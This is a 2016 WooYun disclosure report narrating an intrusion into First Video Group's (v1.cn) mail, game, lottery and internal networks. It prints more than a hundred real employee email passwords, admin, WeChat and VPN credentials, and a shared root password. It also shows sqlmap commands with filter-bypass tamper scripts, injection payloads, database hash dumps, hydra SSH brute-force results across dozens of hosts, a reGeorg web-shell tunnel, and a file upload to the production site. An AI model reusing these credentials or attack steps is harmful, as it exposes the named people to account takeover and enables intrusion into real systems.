当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166852

漏洞标题:第一视频集团内网漫游(60台Linux已root/780w游戏用户/获取www主站权限)

相关厂商:第一视频

漏洞作者: hecate

提交时间:2016-01-02 18:42

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-03: 厂商已经确认,细节仅向厂商公开
2016-01-13: 细节向核心白帽子及相关领域专家公开
2016-01-23: 细节向普通白帽子公开
2016-02-02: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

第一视频集团旗下v1.cn,中国足彩网,彩票365,第一游戏网
奇虎360某工程师中枪

详细说明:

1.入口 http://mail.v1.cn/
使用双拼字典 http://zone.wooyun.org/content/23175 以pitchfork形式对邮箱进行fuzzing,得到弱口令用户,然后登录邮箱脱出所有用户名再一次进行fuzz,得到如下结果

zhangjingyi	zhangjingyi@123
zhangzhongkun zhangzhongkun@123
lijie lijie@123
zhangjiaquan zhangjiaquan@123
jinlijing jinlijing@123
wushiqiang wushiqiang@123
zhouxulong zhouxulong@123
wanglimei wanglimei@123
sundong sundong@123
weiwei weiwei@123
guohao guohao@123
ychr ychr@123
fencheng fencheng@123
renzheng renzheng@123
v1boreport v1boreport@123
security security@123
caichengqi caichengqi@123
caikunhao caikunhao@123
changli changli@123
chenshuai chenshuai@123
chenying chenying@123
chenyushuang chenyushuang@123
chenghengyan chenghengyan@123
dingjingshun dingjingshun@123
dongbaojun dongbaojun@123
dongwenying dongwenying@123
fanxue fanxue@123
feijiuling feijiuling@123
houhaidong houhaidong@123
hujing01 hujing01@123
cphunan cphunan@123
hudongyule hudongyule@123
huanghuanhuan huanghuanhuan@123
huitai huitai@123
huishuai huishuai@123
huobaoqiang huobaoqiang@123
jiaojingjing jiaojingjing@123
jiaoxiaoxue jiaoxiaoxue@123
kongpeng kongpeng@123
lidi lidi@123
lifangfang lifangfang@123
liguohe liguohe@123
lihe lihe@123
lijinxin lijinxin@123
lilingyun lilingyun@123
liyang liyang@123
liyongliang liyongliang@123
lizhen lizhen@123
liujunhao liujunhao@123
liuqiang liuqiang@123
liushengtao liushengtao@123
liushuhan liushuhan@123
liuxiaoyu liuxiaoyu@123
liuyanxia liuyanxia@123
liuzhiyao liuzhiyao@123
liuzhongming liuzhongming@123
luyanlong luyanlong@123
lvlili lvlili@123
lvmin lvmin@123
lvnanjun lvnanjun@123
matian matian@123
maoqibing maoqibing@123
nichong nichong@123
niejie niejie@123
niuyue niuyue@123
peiliying peiliying@123
qisonghai qisonghai@123
quyiwei quyiwei@123
shangchenwei shangchenwei@123
shiyang shiyang@123
sunaili sunaili@123
sunzhimin sunzhimin@123
wanghong wanghong@123
wangjiao wangjiao@123
wangjun wangjun@123
wanglingling wanglingling@123
照片wangshubing wangshubing@123
wangxiaowei wangxiaowei@123
wangyaodong wangyaodong@123
wangzhongyu wangzhongyu@123
weiman weiman@123
wuqiuqiang wuqiuqiang@123
xiangchao xiangchao@123
develop develop@123
xuluning xuluning@123
xuebing xuebing@123
yanerkang yanerkang@123
yangwei yangwei@123
yangxi yangxi@123
yangyonggang yangyonggang@123
yangyunda yangyunda@123
yinhuiting yinhuiting@123
youle youle@123
ylgx ylgx@123
tianxianpei tianxianpei@123
v1gamekefu v1gamekefu@123
yuanchao yuanchao@123
xunuo xunuo@123
zhangbo01 zhangbo01@123
zhanggaofan zhanggaofan@123
zhangjianyang zhangjianyang@123
zhangjingli zhangjingli@123
zhangrong zhangrong@123
zhangxuelun zhangxuelun@123
zhangyi zhangyi@123
zhangyuanyuan zhangyuanyuan@123
zhaohaixia zhaohaixia@123
zhaolin zhaolin@123
zhaoxueying zhaoxueying@123
zhengyunxue zhengyunxue@123
zhonghua zhonghua@123
zhouchunying zhouchunying@123
zhujing zhujing@123
zongbianshi zongbianshi@123
zoujieqi zoujieqi@123
zuoweizhen zuoweizhen@123


2.挨个登录邮箱收集信息,密码不少

V1游戏中心管理后台地址:http://pay.g.v1.cn/Z8Ex1iB5/adminLogin 
一级账号密码:v1game b3&|EE
二级账号密码:sunyonghou sunyonghou


一级账号通过了401认证,但是登录后台却密码错误,然后试试弱口令

liujunhao	123456
xiaoxiang 123123
wangshuai 123123
yuanchao 123456
luozhao 123456
liyang 123123
niejie 123123
wanghong wanghong


随便登录一个

youxi_meitu_2.jpg


788万用户

youxi2_meitu_3.jpg


彩票365微信公众账号密码已修改,具体如下,请知悉,谢谢!
微信公众平台 http://mp.weixin.qq.com
账号:caipiao365@qq.com
密码:ycygcp#^%


111.png


第一彩后台 http://cms.diyicai.com/cms/太多弱口令

fengchao	123456
wangpeng 123456
lixiao lixiao123
changli changli@123
zhangguangchuan caibo2013
ceshibianji editor2013


123.png


域名劫持

112.png


3.邮箱里面搜索vpn

vpn账号  guohao       密码GUO@vodone


拨入vpn,进入内网

vpn.png


windows下意外发现某3389弱口令为 111

Image 1_meitu_2.jpg


还开着360云盘,看了下牛逼的个人简历

245_meitu_1.jpg


奇虎360工程师中枪~~
再回到linux下面,先对内网80端口进行探测,发现主要存活主机在192.168.5和192.168.9段

222.png


一个废旧的办公系统存在大量弱口令,没找到有用的东西
直到找到另一个废站 http://192.168.9.105/
搜索框加单引号报错

111.png


sqlmap跑不出数据库,发现过滤了 > 符号,使用between替换

sqlmap -u "http://192.168.9.105/index.php?ctl=deals&k=" -p "k" --dbs --tamper between.py


192.168.9.105.png


跑出了库又跑不出表,加载多个脚本再一次绕过过滤

sqlmap -u "http://192.168.9.105/index.php?ctl=deals&k=" -p "k" -D "v1zhongchou" --count --tamper equaltolike.py,between.py,randomcase.py,space2comment.py --threads 5
Database: v1zhongchou
Table: fanwe_admin
[1 entry]
+----------+----------------------------------+----+
| adm_name | adm_password | id |
+----------+----------------------------------+----+
| admin | 202cb962ac59075b964b07152d234b70 | 1 |
+----------+----------------------------------+----+


解密后登录后台,还可执行sql语句直接拿shell

111.png


123.png


没找到其他站点,继续探测同网段IP,找到这个后台 http://cms.v1cn/

122.png


并没有对外网解析
fuzz弱口令,多数密码为123456,登陆后发现注入点

http://cms.v1cn/focus/focus/ (POST)
cid=1000&title=&realname=
Parameter: realname (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1000&title=&realname=%' AND 6721=6721 AND '%'='
Parameter: title (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1000&title=%' AND 8956=8956 AND '%'='&realname=
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: cid=1000&title=%';(SELECT * FROM (SELECT(SLEEP(5)))FUnQ)#&realname=
---
web application technology: PHP 5.6.8
back-end DBMS: MySQL 5.0.11


结果是root权限

database management system users password hashes:
[*] cms [1]:
password hash: *A5C1E017AC4909CF2658F951F093855F6EBF8AE7
[*] debian-sys-maint [1]:
password hash: *64931C7647F69D23E93C5B307D559ADD125AAECB
[*] report [1]:
password hash: *8E2B5A8BF835E14935C5C7F3ADE1022CE13A371F
[*] root [2]:
password hash: *06639D44E608EECBDA08F815172DEE51FDD424D8
password hash: *1DBEB20659BE17A3D575ACFAF216A4154C6EF1D0
[*] v1boslave [1]:
password hash: *35BC47EE0DCC18C5F034900CC52FF5EDDDAE0D39
[*] v1cmstmp [1]:
password hash: *DB07F0E31219CFBA057CCBDD5C5045EE53EFCDE6


解密root密码尝试登录服务器

root   v1vodone


登陆成功

333_meitu_1.jpg


原来只是个反向代理服务器,找不到主域名在哪

444.png


4.使出hydra以 v1vodone 作为通用密码对网段22端口进行fuzzing,结果是令人欣慰的

[22][ssh] host: 192.168.5.15   login: root   password: v1vodone
[22][ssh] host: 192.168.5.3 login: root password: v1vodone
[22][ssh] host: 192.168.5.2 login: root password: v1vodone
[22][ssh] host: 192.168.5.5 login: root password: v1vodone
[22][ssh] host: 192.168.5.36 login: root password: v1vodone
[22][ssh] host: 192.168.5.75 login: root password: v1vodone
[22][ssh] host: 192.168.5.73 login: root password: v1vodone
[22][ssh] host: 192.168.5.96 login: root password: v1vodone
[22][ssh] host: 192.168.5.173 login: root password: v1vodone
[22][ssh] host: 192.168.5.172 login: root password: v1vodone
[22][ssh] host: 192.168.9.50 login: root password: v1vodone
[22][ssh] host: 192.168.9.21 login: root password: v1vodone
[22][ssh] host: 192.168.9.33 login: root password: v1vodone
[22][ssh] host: 192.168.9.49 login: root password: v1vodone
[22][ssh] host: 192.168.9.18 login: root password: v1vodone
[22][ssh] host: 192.168.9.35 login: root password: v1vodone
[22][ssh] host: 192.168.9.107 login: root password: v1vodone
[22][ssh] host: 192.168.9.53 login: root password: v1vodone
[22][ssh] host: 192.168.9.102 login: root password: v1vodone
[22][ssh] host: 192.168.9.130 login: root password: v1vodone
[22][ssh] host: 192.168.9.51 login: root password: v1vodone
[22][ssh] host: 192.168.9.128 login: root password: v1vodone
[22][ssh] host: 192.168.9.56 login: root password: v1vodone
[22][ssh] host: 192.168.9.110 login: root password: v1vodone
[22][ssh] host: 192.168.9.125 login: root password: v1vodone
[22][ssh] host: 192.168.9.131 login: root password: v1vodone
[22][ssh] host: 192.168.9.106 login: root password: v1vodone
[22][ssh] host: 192.168.9.132 login: root password: v1vodone
[22][ssh] host: 192.168.9.105 login: root password: v1vodone
[22][ssh] host: 192.168.9.129 login: root password: v1vodone
[22][ssh] host: 192.168.9.109 login: root password: v1vodone
[22][ssh] host: 192.168.9.152 login: root password: v1vodone
[22][ssh] host: 192.168.9.153 login: root password: v1vodone
[22][ssh] host: 192.168.9.151 login: root password: v1vodone
[22][ssh] host: 192.168.9.160 login: root password: v1vodone
[22][ssh] host: 192.168.9.195 login: root password: v1vodone
[22][ssh] host: 192.168.9.171 login: root password: v1vodone
[22][ssh] host: 192.168.9.197 login: root password: v1vodone
[22][ssh] host: 192.168.9.238 login: root password: v1vodone
[22][ssh] host: 192.168.9.223 login: root password: v1vodone
[22][ssh] host: 192.168.9.216 login: root password: v1vodone
[22][ssh] host: 192.168.9.206 login: root password: v1vodone


真是呵呵了!
但是仍找不到主域名在哪,ping主域名只返回外网地址,然后查看hosts

cat /etc/hosts


3321_meitu_1.jpg


由此判断主要域名应在10网段,vpn拨进来的地址在 192.168.5段的办公网络,扫描10网段没发现存活主机,应该是被隔离了;
但是192.168.9段的服务器可以ping通10网段,so可以以此为跳板进入到生产网络,nginx作正向代理不好使,而且不支持https
这时用到了内网的第一个shell,reGeorg+proxychains作为代理

python reGeorgSocksProxy.py -p 9527 -u http://192.168.9.105/tunnel.php


然后继续用通用密码对10.20.1.1/24网段进行fuzz,结果不出所料

[22][ssh] host: 10.20.1.57   login: root   password: v1vodone
[22][ssh] host: 10.20.1.54 login: root password: v1vodone
[22][ssh] host: 10.20.1.55 login: root password: v1vodone
[22][ssh] host: 10.20.1.83 login: root password: v1vodone
[22][ssh] host: 10.20.1.51 login: root password: v1vodone
[22][ssh] host: 10.20.1.119 login: root password: v1vodone
[22][ssh] host: 10.20.1.115 login: root password: v1vodone
[22][ssh] host: 10.20.1.114 login: root password: v1vodone
[22][ssh] host: 10.20.1.196 login: root password: v1vodone
[22][ssh] host: 10.20.1.194 login: root password: v1vodone
[22][ssh] host: 10.20.1.190 login: root password: v1vodone
[22][ssh] host: 10.20.1.163 login: root password: v1vodone
[22][ssh] host: 10.20.1.195 login: root password: v1vodone
[22][ssh] host: 10.20.1.164 login: root password: v1vodone
[22][ssh] host: 10.20.1.212 login: root password: v1vodone
[22][ssh] host: 10.20.1.217 login: root password: v1vodone
[22][ssh] host: 10.20.1.209 login: root password: v1vodone
[22][ssh] host: 10.20.1.216 login: root password: v1vodone
[22][ssh] host: 10.20.1.221 login: root password: v1vodone
[22][ssh] host: 10.20.1.213 login: root password: v1vodone
[22][ssh] host: 10.20.1.220 login: root password: v1vodone
[22][ssh] host: 10.20.1.230 login: root password: v1vodone
[22][ssh] host: 10.20.1.222 login: root password: v1vodone
[22][ssh] host: 10.20.1.211 login: root password: v1vodone


5.发现 10.20.1.17/18/19/119 这个几地址都指向主站

55.png


有负载均衡,但是通用密码恰好能登录 10.20.1.119

66.png


看了配置文件,主域名和二级域名都在

NameVirtualHost *:80
<VirtualHost *:80>
DocumentRoot /VODONE/www/vodone.cms/publish/vodone/
ServerName www.v1.cn
Header unset ETag
FileETag None
# <Location ~ "/[0-9]{4}-[0-9]{2}-[0-9]{2}/">
# ExpiresDefault "access plus 7 days"
# </Location>
CustomLog "|/VODONE/server/apache/bin/rotatelogs /VODONE/logs/apache/www.v1.cn_%Y%m%d.log 86400 480" combined
RewriteEngine on
RewriteCond %{QUERY_STRING} v=(\d+)$
RewriteRule ^/js/video_detail.js http://www.v1.cn/js/video_detail.js? [L,R=302]
RewriteCond %{QUERY_STRING} v=.*$
RewriteRule ^/css/video_detail.css http://www.v1.cn/css/video_detail.css? [L,R=302]
RewriteCond %{QUERY_STRING} ^(\d+)$
RewriteRule ^/player/cloud/config.xml http://www.v1.cn/player/cloud/config.xml? [L,R=302]
RewriteRule ^/(apps|news|shehui|mil|finance|sports|paike|bgt|ent|360movie|360tv|music|fun|culture|lady|auto|tech|games|life|travel|city|gongyi|special|topic)/(.*) http://$1.v1.cn/$2 [L,R=301]
RewriteRule ^/pic/([0-9]{4})-([0-9]{2})-([0-9]{2})/([0-9]+)_[0-9]+.shtml$ /pic/$1-$2-$3/$4.shtml [L]
RewriteCond %{QUERY_STRING} ^toAlbumContent
RewriteRule ^/([0-9]{4})-([0-9]{2})-([0-9]{2})/([0-9]+).shtml$ /focusAlbum.php?req=$0 [QSA,L]
</VirtualHost>
#<VirtualHost *:80>
# DocumentRoot /VODONE/www/vodone.cms/publish/vodone/
# ServerName mirrors.163.com
# ProxyRequests On
# ProxyPassMatch ^/(.*)$ http://mirrors.163.com/$1
#</VirtualHost>
<VirtualHost *:80>
DocumentRoot /VODONE/www/vodone.cms/cms/public
ServerName g.cms.v1cn
ServerAlias www.g.cms.v1cn
ProxyRequests On
ProxyPass /voteadmin/ http://vote.v1.cn/admin/
# Add Domains for ReverseProxy
ProxyPassReverse /voteadmin/ http://vote.v1.cn/admin/
RewriteEngine on
RewriteRule ^/voteadmin/ - [L]
RewriteRule !\.(js|ico|txt|gif|jpg|png|css|swf|xml|flv|html|htm)$|.*(fckeditor/editor).* /index.php
</VirtualHost>
# httpd.conf already set "Options -Indexes FollowSymLinks" for /VODONE/www
<Directory "/VODONE/www/vodone.cms/work/vodone/">
AllowOverride None
Options +Includes
Order allow,deny
Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/vodone/">
AllowOverride None
Options +Includes
Order allow,deny
Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/work/spider/">
AllowOverride None
Options +Includes
Order allow,deny
Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/spider/">
AllowOverride None
Options +Includes
Order allow,deny
Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/work/games/">
AllowOverride FileInfo Limit
Options +Includes
Order allow,deny
Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/games/">
AllowOverride FileInfo Limit
Options +Includes
Order allow,deny
Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/h5/">
AllowOverride FileInfo Limit
Options +Includes
Order allow,deny
Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/work/h5/">
AllowOverride FileInfo Limit
Options +Includes
Order allow,deny
Allow from all
</Directory>
<VirtualHost *:80>
DocumentRoot /VODONE/www/vodone.cms/img/
ServerName image.v1.cn
ServerAlias 0.image.v1.cn 1.image.v1.cn 2.image.v1.cn 3.image.v1.cn 4.image.v1.cn 5.image.v1.cn 6.image.v1.cn 7.image.v1.cn 8.image.v1.cn 9.image.v1.cn
CustomLog "|/VODONE/server/apache/bin/rotatelogs /VODONE/logs/apache/image.v1.cn_%Y%m%d.log 86400 480" combined
</VirtualHost>
<VirtualHost *:80>
DocumentRoot /VODONE/www/vodone.cms/publish/vodone/
ServerName pub.cms.v1cn
</VirtualHost>
<VirtualHost *:80>
DocumentRoot /VODONE/www/vodone.cms/work/vodone/
ServerName work.cms.v1cn
</VirtualHost>
<VirtualHost *:80>
DocumentRoot /VODONE/www/vodone.cms/work/spider/
ServerName spider.cms.v1cn
</VirtualHost>

漏洞证明:

$ proxychains scp -r connf.html root@10.20.1.119:/VODONE/www/vodone.cms/publish/vodone/


111.png


修复方案:

弱口令和注入太多,仅仅上传了几个脚本,没有下载任何数据;
全过程没见到任何安全软件防护,贵公司毫无安全意识可言

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-03 20:03

厂商回复:

感谢关注,请确保信息安全,谢谢

最新状态:

暂无